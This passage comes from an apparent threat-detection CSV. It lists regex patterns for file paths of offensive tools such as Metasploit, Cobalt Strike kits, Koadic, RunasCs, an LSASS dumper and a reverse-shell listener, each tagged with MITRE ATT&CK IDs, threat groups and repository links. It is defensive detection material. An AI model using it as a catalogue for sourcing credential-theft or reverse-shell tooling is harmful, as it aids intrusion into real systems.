APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10611" "*/run/tor/tor.pid*",".{0,1000}\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10612" "*/run_as_psh.*",".{0,1000}\/run_as_psh\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10613" "*/RunasCs.cs*",".{0,1000}\/RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10614" 
"*/RunasCs.exe*",".{0,1000}\/RunasCs\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10615" "*/RunasCs.exe*",".{0,1000}\/RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10616" "*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10617" "*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10618" "*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10619" "*/RunasCs/releases/download/*",".{0,1000}\/RunasCs\/releases\/download\/.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10620" "*/RunasCs_binaries.zip*",".{0,1000}\/RunasCs_binaries\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10621" "*/RunasCs_x86.zip*",".{0,1000}\/RunasCs_x86\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","10622" "*/runasppl.py*",".{0,1000}\/runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10623" "*/RunAsWinTcb.git*",".{0,1000}\/RunAsWinTcb\.git.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","10624" "*/RunAsWinTcb.iml*",".{0,1000}\/RunAsWinTcb\.iml.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","10625" "*/runcalc.dll*",".{0,1000}\/runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10626" "*/runcmd.lua*",".{0,1000}\/runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10627" "*/runcmd2.lua*",".{0,1000}\/runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10628" "*/rundll32.cmd*",".{0,1000}\/rundll32\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10629" "*/rundll32_js*",".{0,1000}\/rundll32_js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10630" "*/RunOF/RunOF/*",".{0,1000}\/RunOF\/RunOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","10631" "*/RunPEinMemory.exe*",".{0,1000}\/RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10632" "*/RunPEinMemory64.exe*",".{0,1000}\/RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","10633" 
"*/runshellcode.*",".{0,1000}\/runshellcode\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","10634" "*/runswhide.lua*",".{0,1000}\/runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive 
Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10635" "*/RuralBishop.git*",".{0,1000}\/RuralBishop\.git.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","10636" "*/rusers.nse*",".{0,1000}\/rusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10637" "*/rustcat/releases/latest/download/*",".{0,1000}\/rustcat\/releases\/latest\/download\/.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","10638" "*/Rust-for-Malware-Development.git*",".{0,1000}\/Rust\-for\-Malware\-Development\.git.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using 
Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","10642" "*/rusthound.exe*",".{0,1000}\/rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","10643" "*/RustHound.git*",".{0,1000}\/RustHound\.git.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","10644" "*/RustiveDump.exe*",".{0,1000}\/RustiveDump\.exe.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","10645" "*/RustiveDump.git*",".{0,1000}\/RustiveDump\.git.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","10646" "*/RustPotato.git*",".{0,1000}\/RustPotato\.git.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM 
privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","10647" "*/RustRedOps.git*",".{0,1000}\/RustRedOps\.git.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10648" "*/rvrsh3ll/*",".{0,1000}\/rvrsh3ll\/.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","10652" "*/RWXfinder.git*",".{0,1000}\/RWXfinder\.git.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","10653" "*/s3aclenum.py*",".{0,1000}\/s3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10654" "*/S3cur3Th1sSh1t/*",".{0,1000}\/S3cur3Th1sSh1t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","10655" "*/s3enum.py*",".{0,1000}\/s3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10656" "*/S3Scanner.git*",".{0,1000}\/S3Scanner\.git.{0,1000}","offensive_tool_keyword","S3Scanner","Scan 
for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","10657" "*/S4UTomato.git*",".{0,1000}\/S4UTomato\.git.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","10659" "*/s72 Shell v1.1 Coding.php*",".{0,1000}\/s72\sShell\sv1\.1\sCoding\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10660" "*/s7-info.nse*",".{0,1000}\/s7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10661" "*/saefko.profile*",".{0,1000}\/saefko\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
